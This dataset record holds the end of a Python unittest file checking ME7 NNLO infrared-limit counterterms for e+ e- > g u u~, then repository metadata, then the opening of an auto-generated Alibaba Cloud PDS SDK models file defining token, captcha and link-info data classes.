options['limits'] = 'C(1,4)'
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
options['limits'] = 'C(2,4)'
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
options['limits'] = 'C(1,5)'
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
options['limits'] = 'C(2,5)'
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
#===============================================================================
# TestME7 colorful output for e+ e- > g u u~ @NNLO
#===============================================================================
class TestME7_NNLO_colorful_epem_guux(unittest.TestCase):
"""This test validates the command 'test_IR_limits' of ME7 in the colorful scheme
as well as integrand calls for the process e+ e- > g u u~ --NNLO=QCD"""
# If the debug mode is set to True, then the process output is not refreshed
# but reused instead
debugging = False
is_process_generated = False
def setUp(self):
""" basic building of the class to test """
self.tmp_process_dir = pjoin(_file_path, 'TMP_TestME7_colorful_epem_guux_NNLO_output')
# Generate the process output if it does not exist yet or if we
# are not in debug mode.
if os.path.isdir(self.tmp_process_dir):
if not self.is_process_generated and not self.debugging:
shutil.rmtree(self.tmp_process_dir)
else:
TestME7_NNLO_colorful_epem_guux.is_process_generated = True
if not self.is_process_generated:
self.cmd = Cmd.MasterCmd()
if os.path.isdir(self.tmp_process_dir):
shutil.rmtree(self.tmp_process_dir)
# Now generate and output a process, so as to run ME7 commands on it
self.do('import model loop_sm')
self.do('set subtraction_scheme colorful')
self.do('generate e+ e- > g u u~ --NNLO=QCD --ignore_contributions=V,VV')
self.do('output %s --ignore_integrated_counterterms=all' % self.tmp_process_dir)
TestME7_NNLO_colorful_epem_guux.is_process_generated = True
if self.debugging:
misc.sprint(debugging_warning)
misc.sprint(
debugging_written % (self.__class__.__name__, self.tmp_process_dir))
else:
if self.debugging:
misc.sprint(debugging_warning)
misc.sprint(
debugging_reused % (self.__class__.__name__, self.tmp_process_dir))
# Now initialize an ME7 interface on the above process output
self.cmd = ME7_interface.MadEvent7Cmd(me_dir=self.tmp_process_dir)
self.cmd.no_notification()
def __del__(self):
if os.path.isdir(self.tmp_process_dir) and not self.debugging:
shutil.rmtree(self.tmp_process_dir)
def do(self, line):
""" exec a line in the cmd under test """
self.cmd.exec_cmd(line)
def verify_ME7_test_results(self, results_file):
"""Parse and verify that all tests output in 'results_file_path' are passed."""
full_path = pjoin(self.tmp_process_dir, results_file)
for line in open(full_path, 'r').read().split('\n'):
process, limit, outcome, ratio = line.split('|')[:4]
self.assertTrue(outcome.strip() == 'PASSED', line)
def test_ME7_g_gqqx_triple_collinear(self):
options = {'correction_order': 'NNLO',
'limits': 'C(3,4,5)',
'counterterms': 'C(3,4,5)',
'process': 'e+ e- > g u u~ u~ u',
'show_plots': False,
'save_plots': False,
'seed': 666,
'n_steps': 10,
'min_scaling_variable': 1.0e-16,
'acceptance_threshold': 5.0e-4,
'save_results_to_path': 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
def test_ME7_q_qqqx_triple_collinear(self):
options = {'correction_order': 'NNLO',
'limits': 'C(4,5,7)',
'counterterms': 'C(4,5,7)',
'process': 'e+ e- > g u u~ u~ u',
'show_plots': False,
'save_plots': False,
'seed': 666,
'n_steps': 10,
'min_scaling_variable': 1.0e-16,
'acceptance_threshold': 5.0e-4,
'save_results_to_path': 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
def test_ME7_q_qQQx_triple_collinear(self):
options = {'correction_order': 'NNLO',
'limits': 'C(4,6,7)',
'counterterms': 'C(4,6,7)',
'process': 'e+ e- > g u u~ s~ s',
'show_plots': False,
'save_plots': False,
'seed': 666,
'n_steps': 10,
'min_scaling_variable': 1.0e-16,
'acceptance_threshold': 5.0e-4,
'save_results_to_path': 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
def test_ME7_q_qgg_triple_collinear(self):
options = {'correction_order': 'NNLO',
'limits': 'C(3,4,6)',
'counterterms': 'C(3,4,6)',
'process': 'e+ e- > g u u~ g g',
'show_plots': False,
'save_plots': False,
'seed': 666,
'n_steps': 10,
'min_scaling_variable': 1.0e-16,
'acceptance_threshold': 5.0e-4,
'save_results_to_path': 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
def test_ME7_g_ggg_triple_collinear(self):
options = {'correction_order': 'NNLO',
'limits': 'C(3,6,7)',
'counterterms': 'C(3,6,7)',
'process': 'e+ e- > g u u~ g g',
'show_plots': False,
'save_plots': False,
'seed': 666,
'n_steps': 10,
'min_scaling_variable': 1.0e-16,
'acceptance_threshold': 5.0e-4,
'save_results_to_path': 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
def test_ME7_all_triple_collinears(self):
options = {'correction_order': 'NNLO',
'limits': "r'\(C\(\d,\d,\d\),\)'",
'counterterms': 'def',
'show_plots': False,
'save_plots': False,
'seed': 666,
'n_steps': 10,
'min_scaling_variable': 1.0e-16,
'acceptance_threshold': 8.0e-4,
'save_results_to_path': 'test_IR_limit_output_for_acceptance_test.dat'
}
self.do(get_test_IR_limit_cmd(options))
self.verify_ME7_test_results(options['save_results_to_path'])
| 43.728788
| 94
| 0.547902
| 3,361
| 28,861
| 4.408807
| 0.088962
| 0.022675
| 0.04535
| 0.055068
| 0.879066
| 0.866649
| 0.858011
| 0.850452
| 0.847348
| 0.833986
| 0
| 0.019438
| 0.326219
| 28,861
| 659
| 95
| 43.795144
| 0.742569
| 0.132185
| 0
| 0.735849
| 0
| 0.002096
| 0.187738
| 0.043881
| 0.006289
| 0
| 0
| 0
| 0.014675
| 1
| 0.079665
| false
| 0.008386
| 0.041929
| 0
| 0.148847
| 0.033543
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
763d100b0c721c908e88a1328b813060f00aeed2
| 723,620
|
py
|
Python
|
hosting/python/alibabacloud_pds_hosting_sdk/models.py
|
tianxuan-cl/alibabacloud-pds-sdk
|
a0fabd67f7b3baf03192a50858ff97e4247c92ef
|
[
"Apache-2.0"
] | 4
|
2020-08-21T08:40:27.000Z
|
2021-04-04T03:39:06.000Z
|
hosting/python/alibabacloud_pds_hosting_sdk/models.py
|
tianxuan-cl/alibabacloud-pds-sdk
|
a0fabd67f7b3baf03192a50858ff97e4247c92ef
|
[
"Apache-2.0"
] | 35
|
2020-08-31T08:10:53.000Z
|
2022-03-24T09:43:11.000Z
|
hosting/python/alibabacloud_pds_hosting_sdk/models.py
|
tianxuan-cl/alibabacloud-pds-sdk
|
a0fabd67f7b3baf03192a50858ff97e4247c92ef
|
[
"Apache-2.0"
] | 16
|
2020-08-24T05:42:43.000Z
|
2022-03-16T03:03:53.000Z
|
# -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
from typing import List, Dict
class RuntimeOptions(TeaModel):
def __init__(
self,
autoretry: bool = None,
ignore_ssl: bool = None,
max_attempts: int = None,
backoff_policy: str = None,
backoff_period: int = None,
read_timeout: int = None,
connect_timeout: int = None,
http_proxy: str = None,
https_proxy: str = None,
no_proxy: str = None,
max_idle_conns: int = None,
local_addr: str = None,
socks_5proxy: str = None,
socks_5net_work: str = None,
):
# whether to try again
self.autoretry = autoretry
# ignore SSL validation
self.ignore_ssl = ignore_ssl
# maximum number of retries
self.max_attempts = max_attempts
# backoff policy
self.backoff_policy = backoff_policy
# backoff period
self.backoff_period = backoff_period
# read timeout
self.read_timeout = read_timeout
# connect timeout
self.connect_timeout = connect_timeout
# http proxy url
self.http_proxy = http_proxy
# https Proxy url
self.https_proxy = https_proxy
# agent blacklist
self.no_proxy = no_proxy
# maximum number of connections
self.max_idle_conns = max_idle_conns
# local addr
self.local_addr = local_addr
# SOCKS5 proxy
self.socks_5proxy = socks_5proxy
# SOCKS5 netWork
self.socks_5net_work = socks_5net_work
def validate(self):
pass
def to_map(self):
result = dict()
if self.autoretry is not None:
result['autoretry'] = self.autoretry
if self.ignore_ssl is not None:
result['ignoreSSL'] = self.ignore_ssl
if self.max_attempts is not None:
result['maxAttempts'] = self.max_attempts
if self.backoff_policy is not None:
result['backoffPolicy'] = self.backoff_policy
if self.backoff_period is not None:
result['backoffPeriod'] = self.backoff_period
if self.read_timeout is not None:
result['readTimeout'] = self.read_timeout
if self.connect_timeout is not None:
result['connectTimeout'] = self.connect_timeout
if self.http_proxy is not None:
result['httpProxy'] = self.http_proxy
if self.https_proxy is not None:
result['httpsProxy'] = self.https_proxy
if self.no_proxy is not None:
result['noProxy'] = self.no_proxy
if self.max_idle_conns is not None:
result['maxIdleConns'] = self.max_idle_conns
if self.local_addr is not None:
result['localAddr'] = self.local_addr
if self.socks_5proxy is not None:
result['socks5Proxy'] = self.socks_5proxy
if self.socks_5net_work is not None:
result['socks5NetWork'] = self.socks_5net_work
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('autoretry') is not None:
self.autoretry = m.get('autoretry')
if m.get('ignoreSSL') is not None:
self.ignore_ssl = m.get('ignoreSSL')
if m.get('maxAttempts') is not None:
self.max_attempts = m.get('maxAttempts')
if m.get('backoffPolicy') is not None:
self.backoff_policy = m.get('backoffPolicy')
if m.get('backoffPeriod') is not None:
self.backoff_period = m.get('backoffPeriod')
if m.get('readTimeout') is not None:
self.read_timeout = m.get('readTimeout')
if m.get('connectTimeout') is not None:
self.connect_timeout = m.get('connectTimeout')
if m.get('httpProxy') is not None:
self.http_proxy = m.get('httpProxy')
if m.get('httpsProxy') is not None:
self.https_proxy = m.get('httpsProxy')
if m.get('noProxy') is not None:
self.no_proxy = m.get('noProxy')
if m.get('maxIdleConns') is not None:
self.max_idle_conns = m.get('maxIdleConns')
if m.get('localAddr') is not None:
self.local_addr = m.get('localAddr')
if m.get('socks5Proxy') is not None:
self.socks_5proxy = m.get('socks5Proxy')
if m.get('socks5NetWork') is not None:
self.socks_5net_work = m.get('socks5NetWork')
return self
class Config(TeaModel):
def __init__(
self,
endpoint: str = None,
domain_id: str = None,
client_id: str = None,
refresh_token: str = None,
client_secret: str = None,
access_token: str = None,
expire_time: str = None,
protocol: str = None,
type: str = None,
security_token: str = None,
access_key_id: str = None,
access_key_secret: str = None,
nickname: str = None,
user_agent: str = None,
):
self.endpoint = endpoint
self.domain_id = domain_id
self.client_id = client_id
self.refresh_token = refresh_token
self.client_secret = client_secret
self.access_token = access_token
self.expire_time = expire_time
self.protocol = protocol
self.type = type
self.security_token = security_token
self.access_key_id = access_key_id
self.access_key_secret = access_key_secret
self.nickname = nickname
self.user_agent = user_agent
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '^[a-zA-Z0-9_-]+$')
def to_map(self):
result = dict()
if self.endpoint is not None:
result['endpoint'] = self.endpoint
if self.domain_id is not None:
result['domainId'] = self.domain_id
if self.client_id is not None:
result['clientId'] = self.client_id
if self.refresh_token is not None:
result['refreshToken'] = self.refresh_token
if self.client_secret is not None:
result['clientSecret'] = self.client_secret
if self.access_token is not None:
result['accessToken'] = self.access_token
if self.expire_time is not None:
result['expireTime'] = self.expire_time
if self.protocol is not None:
result['protocol'] = self.protocol
if self.type is not None:
result['type'] = self.type
if self.security_token is not None:
result['securityToken'] = self.security_token
if self.access_key_id is not None:
result['accessKeyId'] = self.access_key_id
if self.access_key_secret is not None:
result['accessKeySecret'] = self.access_key_secret
if self.nickname is not None:
result['nickname'] = self.nickname
if self.user_agent is not None:
result['userAgent'] = self.user_agent
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('endpoint') is not None:
self.endpoint = m.get('endpoint')
if m.get('domainId') is not None:
self.domain_id = m.get('domainId')
if m.get('clientId') is not None:
self.client_id = m.get('clientId')
if m.get('refreshToken') is not None:
self.refresh_token = m.get('refreshToken')
if m.get('clientSecret') is not None:
self.client_secret = m.get('clientSecret')
if m.get('accessToken') is not None:
self.access_token = m.get('accessToken')
if m.get('expireTime') is not None:
self.expire_time = m.get('expireTime')
if m.get('protocol') is not None:
self.protocol = m.get('protocol')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('securityToken') is not None:
self.security_token = m.get('securityToken')
if m.get('accessKeyId') is not None:
self.access_key_id = m.get('accessKeyId')
if m.get('accessKeySecret') is not None:
self.access_key_secret = m.get('accessKeySecret')
if m.get('nickname') is not None:
self.nickname = m.get('nickname')
if m.get('userAgent') is not None:
self.user_agent = m.get('userAgent')
return self
class LinkInfo(TeaModel):
"""
*\
"""
def __init__(
self,
extra: str = None,
identity: str = None,
type: str = None,
):
# 额外的信息,比如type为mobile时,此字段为国家编号,不填默认86
self.extra = extra
# 当前用户已存在的登录标识
self.identity = identity
# 当前用户已存在的登录方式
self.type = type
def validate(self):
pass
def to_map(self):
result = dict()
if self.extra is not None:
result['extra'] = self.extra
if self.identity is not None:
result['identity'] = self.identity
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('extra') is not None:
self.extra = m.get('extra')
if m.get('identity') is not None:
self.identity = m.get('identity')
if m.get('type') is not None:
self.type = m.get('type')
return self
class AccountAccessTokenResponse(TeaModel):
"""
*\
"""
def __init__(
self,
access_token: str = None,
avatar: str = None,
default_drive_id: str = None,
default_sbox_drive_id: str = None,
device_id: str = None,
device_name: str = None,
exist_link: List[LinkInfo] = None,
expire_time: str = None,
expires_in: int = None,
is_first_login: bool = None,
need_link: bool = None,
need_rp_verify: bool = None,
nick_name: str = None,
pin_setup: bool = None,
refresh_token: str = None,
role: str = None,
state: str = None,
token_type: str = None,
user_data: dict = None,
user_id: str = None,
user_name: str = None,
):
# 用于调用业务接口的accessToken
self.access_token = access_token
# 当前用户头像
self.avatar = avatar
# Default Drive ID
self.default_drive_id = default_drive_id
# Default Sbox Drive ID
self.default_sbox_drive_id = default_sbox_drive_id
# device_id 通过device flow 绑定的设备ID
self.device_id = device_id
# device_name 通过device flow 绑定的设备名
self.device_name = device_name
# 当前用户已存在的登录方式
self.exist_link = exist_link
# accessToken过期时间,ISO时间
self.expire_time = expire_time
# accessToken过期时间,单位秒
self.expires_in = expires_in
# 用户是否为第一次登录
self.is_first_login = is_first_login
# 是否需要绑定
self.need_link = need_link
# 用户是否需要进行的实人认证
self.need_rp_verify = need_rp_verify
# 当前用户昵称
self.nick_name = nick_name
# 用户的数据密码是否设置过
self.pin_setup = pin_setup
# 用于刷新accessToken
self.refresh_token = refresh_token
# 当前用户角色
self.role = role
# 临时权限,用于登录成功后设置密码
self.state = state
# accessToken类型,Bearer
self.token_type = token_type
# 用户自定义数据,格式为json,可用于配置项、少量临时数据等存储,不超过1K
self.user_data = user_data
# 当前用户ID
self.user_id = user_id
# 当前用户名
self.user_name = user_name
def validate(self):
self.validate_required(self.access_token, 'access_token')
if self.exist_link:
for k in self.exist_link:
if k:
k.validate()
self.validate_required(self.need_link, 'need_link')
def to_map(self):
result = dict()
if self.access_token is not None:
result['access_token'] = self.access_token
if self.avatar is not None:
result['avatar'] = self.avatar
if self.default_drive_id is not None:
result['default_drive_id'] = self.default_drive_id
if self.default_sbox_drive_id is not None:
result['default_sbox_drive_id'] = self.default_sbox_drive_id
if self.device_id is not None:
result['device_id'] = self.device_id
if self.device_name is not None:
result['device_name'] = self.device_name
result['exist_link'] = []
if self.exist_link is not None:
for k in self.exist_link:
result['exist_link'].append(k.to_map() if k else None)
if self.expire_time is not None:
result['expire_time'] = self.expire_time
if self.expires_in is not None:
result['expires_in'] = self.expires_in
if self.is_first_login is not None:
result['is_first_login'] = self.is_first_login
if self.need_link is not None:
result['need_link'] = self.need_link
if self.need_rp_verify is not None:
result['need_rp_verify'] = self.need_rp_verify
if self.nick_name is not None:
result['nick_name'] = self.nick_name
if self.pin_setup is not None:
result['pin_setup'] = self.pin_setup
if self.refresh_token is not None:
result['refresh_token'] = self.refresh_token
if self.role is not None:
result['role'] = self.role
if self.state is not None:
result['state'] = self.state
if self.token_type is not None:
result['token_type'] = self.token_type
if self.user_data is not None:
result['user_data'] = self.user_data
if self.user_id is not None:
result['user_id'] = self.user_id
if self.user_name is not None:
result['user_name'] = self.user_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('access_token') is not None:
self.access_token = m.get('access_token')
if m.get('avatar') is not None:
self.avatar = m.get('avatar')
if m.get('default_drive_id') is not None:
self.default_drive_id = m.get('default_drive_id')
if m.get('default_sbox_drive_id') is not None:
self.default_sbox_drive_id = m.get('default_sbox_drive_id')
if m.get('device_id') is not None:
self.device_id = m.get('device_id')
if m.get('device_name') is not None:
self.device_name = m.get('device_name')
self.exist_link = []
if m.get('exist_link') is not None:
for k in m.get('exist_link'):
temp_model = LinkInfo()
self.exist_link.append(temp_model.from_map(k))
if m.get('expire_time') is not None:
self.expire_time = m.get('expire_time')
if m.get('expires_in') is not None:
self.expires_in = m.get('expires_in')
if m.get('is_first_login') is not None:
self.is_first_login = m.get('is_first_login')
if m.get('need_link') is not None:
self.need_link = m.get('need_link')
if m.get('need_rp_verify') is not None:
self.need_rp_verify = m.get('need_rp_verify')
if m.get('nick_name') is not None:
self.nick_name = m.get('nick_name')
if m.get('pin_setup') is not None:
self.pin_setup = m.get('pin_setup')
if m.get('refresh_token') is not None:
self.refresh_token = m.get('refresh_token')
if m.get('role') is not None:
self.role = m.get('role')
if m.get('state') is not None:
self.state = m.get('state')
if m.get('token_type') is not None:
self.token_type = m.get('token_type')
if m.get('user_data') is not None:
self.user_data = m.get('user_data')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
if m.get('user_name') is not None:
self.user_name = m.get('user_name')
return self
class CancelLinkModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: AccountAccessTokenResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = AccountAccessTokenResponse()
self.body = temp_model.from_map(m['body'])
return self
class ConfirmLinkModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: AccountAccessTokenResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = AccountAccessTokenResponse()
self.body = temp_model.from_map(m['body'])
return self
class ChangePasswordModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: AccountAccessTokenResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = AccountAccessTokenResponse()
self.body = temp_model.from_map(m['body'])
return self
class SetPasswordModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
pass
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class VerifyCodeResponse(TeaModel):
"""
*\
"""
def __init__(
self,
state: str = None,
):
# 修改密码的临时授权码
self.state = state
def validate(self):
self.validate_required(self.state, 'state')
def to_map(self):
result = dict()
if self.state is not None:
result['state'] = self.state
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('state') is not None:
self.state = m.get('state')
return self
class VerifyCodeModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: VerifyCodeResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = VerifyCodeResponse()
self.body = temp_model.from_map(m['body'])
return self
class GetAccessTokenByLinkInfoModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: AccountAccessTokenResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = AccountAccessTokenResponse()
self.body = temp_model.from_map(m['body'])
return self
class Captcha(TeaModel):
"""
*\
"""
def __init__(
self,
captcha: str = None,
captcha_format: str = None,
captcha_id: str = None,
):
# 图片验证码,base64格式
self.captcha = captcha
# 图片格式
self.captcha_format = captcha_format
# 图片验证码ID
self.captcha_id = captcha_id
def validate(self):
self.validate_required(self.captcha, 'captcha')
self.validate_required(self.captcha_format, 'captcha_format')
self.validate_required(self.captcha_id, 'captcha_id')
def to_map(self):
result = dict()
if self.captcha is not None:
result['captcha'] = self.captcha
if self.captcha_format is not None:
result['captcha_format'] = self.captcha_format
if self.captcha_id is not None:
result['captcha_id'] = self.captcha_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('captcha') is not None:
self.captcha = m.get('captcha')
if m.get('captcha_format') is not None:
self.captcha_format = m.get('captcha_format')
if m.get('captcha_id') is not None:
self.captcha_id = m.get('captcha_id')
return self
class GetCaptchaModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: Captcha = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = Captcha()
self.body = temp_model.from_map(m['body'])
return self
class LinkInfoResponse(TeaModel):
"""
*\
"""
def __init__(
self,
authentication_type: str = None,
created_at: int = None,
domain_id: str = None,
extra: str = None,
identity: str = None,
last_login_time: int = None,
status: str = None,
user_id: str = None,
):
# 认证类型
self.authentication_type = authentication_type
# 创建时间
self.created_at = created_at
# Domain ID
self.domain_id = domain_id
# 额外的信息,比如type为mobile时,此字段为国家编号,不填默认86
self.extra = extra
# 唯一身份标识
self.identity = identity
# 最后登录时间
self.last_login_time = last_login_time
# 状态
self.status = status
# 用户ID
self.user_id = user_id
def validate(self):
self.validate_required(self.authentication_type, 'authentication_type')
self.validate_required(self.created_at, 'created_at')
self.validate_required(self.domain_id, 'domain_id')
self.validate_required(self.identity, 'identity')
self.validate_required(self.last_login_time, 'last_login_time')
self.validate_required(self.status, 'status')
self.validate_required(self.user_id, 'user_id')
def to_map(self):
result = dict()
if self.authentication_type is not None:
result['authentication_type'] = self.authentication_type
if self.created_at is not None:
result['created_at'] = self.created_at
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.extra is not None:
result['extra'] = self.extra
if self.identity is not None:
result['identity'] = self.identity
if self.last_login_time is not None:
result['last_login_time'] = self.last_login_time
if self.status is not None:
result['status'] = self.status
if self.user_id is not None:
result['user_id'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('authentication_type') is not None:
self.authentication_type = m.get('authentication_type')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('extra') is not None:
self.extra = m.get('extra')
if m.get('identity') is not None:
self.identity = m.get('identity')
if m.get('last_login_time') is not None:
self.last_login_time = m.get('last_login_time')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
return self
class GetLinkInfoModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: LinkInfoResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = LinkInfoResponse()
self.body = temp_model.from_map(m['body'])
return self
class LinkInfoListResponse(TeaModel):
"""
*\
"""
def __init__(
self,
items: List[LinkInfoResponse] = None,
):
# items
self.items = items
def validate(self):
self.validate_required(self.items, 'items')
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = LinkInfoResponse()
self.items.append(temp_model.from_map(k))
return self
class GetLinkInfoByUserIdModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: LinkInfoListResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = LinkInfoListResponse()
self.body = temp_model.from_map(m['body'])
return self
class GetPublicKeyResponse(TeaModel):
"""
*\
"""
def __init__(
self,
app_id: str = None,
key_pair_id: str = None,
public_key: str = None,
):
# App ID
self.app_id = app_id
self.key_pair_id = key_pair_id
# RSA加密算法的公钥, PEM格式
self.public_key = public_key
def validate(self):
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.public_key, 'public_key')
def to_map(self):
result = dict()
if self.app_id is not None:
result['app_id'] = self.app_id
if self.key_pair_id is not None:
result['key_pair_id'] = self.key_pair_id
if self.public_key is not None:
result['public_key'] = self.public_key
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('key_pair_id') is not None:
self.key_pair_id = m.get('key_pair_id')
if m.get('public_key') is not None:
self.public_key = m.get('public_key')
return self
class GetPublicKeyModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetPublicKeyResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetPublicKeyResponse()
self.body = temp_model.from_map(m['body'])
return self
class LinkModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: AccountAccessTokenResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = AccountAccessTokenResponse()
self.body = temp_model.from_map(m['body'])
return self
class MobileCheckExistResponse(TeaModel):
"""
*\
"""
def __init__(
self,
is_exist: bool = None,
phone_number: str = None,
phone_region: str = None,
):
# 当前手机号是否存在
self.is_exist = is_exist
# 待查询的手机号
self.phone_number = phone_number
# 国家编号,默认86,不需要填+号,直接填数字
self.phone_region = phone_region
def validate(self):
self.validate_required(self.is_exist, 'is_exist')
self.validate_required(self.phone_number, 'phone_number')
def to_map(self):
result = dict()
if self.is_exist is not None:
result['is_exist'] = self.is_exist
if self.phone_number is not None:
result['phone_number'] = self.phone_number
if self.phone_region is not None:
result['phone_region'] = self.phone_region
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('is_exist') is not None:
self.is_exist = m.get('is_exist')
if m.get('phone_number') is not None:
self.phone_number = m.get('phone_number')
if m.get('phone_region') is not None:
self.phone_region = m.get('phone_region')
return self
class CheckExistModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: MobileCheckExistResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = MobileCheckExistResponse()
self.body = temp_model.from_map(m['body'])
return self
class LoginModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
